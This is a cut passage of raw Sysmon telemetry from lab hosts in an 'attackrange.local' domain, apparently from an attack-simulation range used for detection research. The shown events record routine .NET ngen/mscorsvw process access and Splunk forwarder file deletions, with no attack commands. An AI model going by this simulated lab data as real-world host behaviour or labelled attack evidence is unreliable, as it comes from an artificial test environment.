Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=32E5850B925F395A343EFDB230CB3CE8,SHA256=9CCA2E0E263FDE0146CA6462A914BDC0CF870A6C5F6A5E4F1FE3F1D1552AEB72,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000080845Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:48.294{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC28-607E-E10E-00000000BB01}2088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080844Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:48.278{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EC28-607E-E10E-00000000BB01}2088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080843Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:48.278{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC28-607E-E10E-00000000BB01}2088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080842Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:48.247{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC28-607E-E00E-00000000BB01}3480C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080841Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:48.247{A7A01FEF-C0A6-607E-8105-00000000BB01}8362600C:\Windows\Explorer.EXE{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618a4|C:\Windows\System32\SHELL32.dll+62e17|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080840Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:48.231{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EC28-607E-E00E-00000000BB01}3480C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080839Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:48.231{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC28-607E-E00E-00000000BB01}3480C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080838Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:48.200{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC28-607E-DF0E-00000000BB01}3784C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080837Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:48.185{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EC28-607E-DF0E-00000000BB01}3784C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080836Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:48.185{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC28-607E-DF0E-00000000BB01}3784C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080835Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:48.153{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC28-607E-DE0E-00000000BB01}3988C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080834Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:48.138{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EC28-607E-DE0E-00000000BB01}3988C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080833Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:48.138{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC28-607E-DE0E-00000000BB01}3988C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000050591Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:48.315{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=121F6B0CA4347029C9F13CA30B007722,SHA256=7E67C7B0B425D5AA7DF681306B826D8D19A8803647495ED5CFF20F29DE44AFDE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050590Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:48.127{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=44FACB5F3314CD0E2DC654EACF4A1304,SHA256=A9569F79671942745B704F8076761B4FF447B7C8F5F5C4C42BEF9BF7114B37A7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000080896Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:49.638{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC29-607E-F10E-00000000BB01}4064C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080895Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:49.622{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EC29-607E-F10E-00000000BB01}4064C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080894Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:49.622{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC29-607E-F10E-00000000BB01}4064C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080893Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:49.528{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC29-607E-F00E-00000000BB01}5364C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080892Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:49.513{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EC29-607E-F00E-00000000BB01}5364C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080891Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:49.513{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC29-607E-F00E-00000000BB01}5364C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000080890Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:49.481{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=D542EFA5E32AA1640F3176EB0945DEFA,SHA256=964C55B0096F6CFE6F969F73B098E0EB31768845E4499742EC120D624B031655,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000080889Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:49.481{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=24099FDF123081EDEC51C408242B1D65,SHA256=160E18B1CAF56754FEA9AD1DB44B1B0E3E6D2435AA2CB4D1E2266D9C9EF164CD,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000080888Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:49.481{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC29-607E-EF0E-00000000BB01}6012C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080887Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:49.466{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EC29-607E-EF0E-00000000BB01}6012C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080886Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:49.466{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC29-607E-EF0E-00000000BB01}6012C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C: